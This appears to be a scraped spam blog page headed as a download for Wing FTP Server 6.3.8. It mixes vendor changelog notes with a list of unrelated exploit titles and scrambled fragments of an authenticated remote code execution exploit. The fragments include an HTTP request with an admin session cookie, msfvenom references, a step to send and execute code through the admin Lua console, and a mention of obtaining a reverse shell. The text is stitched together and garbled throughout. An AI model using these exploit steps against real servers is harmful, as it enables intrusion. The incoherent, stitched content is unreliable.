ertasty.blogg.se - Download wing ftp server 6.3.8

Download wing ftp server 6.3.8 - remote code execution

Fixed a bug - SFTP server will return an error "File can not be locked" occasionally.

Fixed a bug - Fixed a DOM XSS vulnerability related to Weblink in web client.

Fixed a bug - Fixed two CSRF vulnerabilities in web administration/web client.

Wing FTP Server v7.1.9 Released: 6/Mar/2023

Improvement - Simplified the UI for the SSL certificate creation.

Improvement - Clicking the button "Clear Log" or "Kick All" won't take effect sometimes.

Improvement - Cannot add/modify or delete the domain listeners occasionally.

Fixed a bug - The SFTP server might crash when using WinSCP with some special parameters.

Now support FastUDP mode for Wing Gateway's HTTPS listener, it is designed to accelerate file transfers for high latency network.

Wing FTP Server v7.2.0 Released: 20/Mar/2023

Improvement - Updated libssh to the latest version.

Improvement - When writing the uploaded file fails (SFTP protocol), the temp uploaded file will be removed.

Improvement - The Web Client text editor now supports syntax highlighting for.

Improvement - During installation on Windows Server Core, you will be asked to start WingFTP service instead of tray application.Fixed a bug - When editing a user, pressing Tab to the password field will hide the new password.Fixed a bug - The WingFTP service will crash when testing ODBC with a wrong ODBC source.Wing FTP Server v7.2.1 Released: 6/May/2023 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" "ChurchCRM 4.2.0 - CSV/Formula Injection" "DotCMS 20.11 - Stored Cross-Site Scripting"

No rate Limit on Password Reset functionality" "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" "NewsLister - Authenticated Persistent Cross-Site Scripting" "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" "Mitel mitel-cs018 - Call Data Information Disclosure" html Content - Type : text / plain charset = UTF - 8 Content - Length : 153 Connection : close Cookie : admin_lang = english admin_login_name = admin UIDADMIN = 75e5058 fb61a81e427ae86f55794f1f5 command = os. msfvenom ) 2 ) Send and execute via POST POST / admin_lua_. For authenticated users, this console can be exploited to obtaining a reverse shell. # Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated) # Date: # Exploit Author: v1n1v131r4 # Vendor Homepage: # Software Link: # Version: 6.3.8 # Tested on: Windows 10 # CVE : - Wing FTP Server have a web console based on Lua language.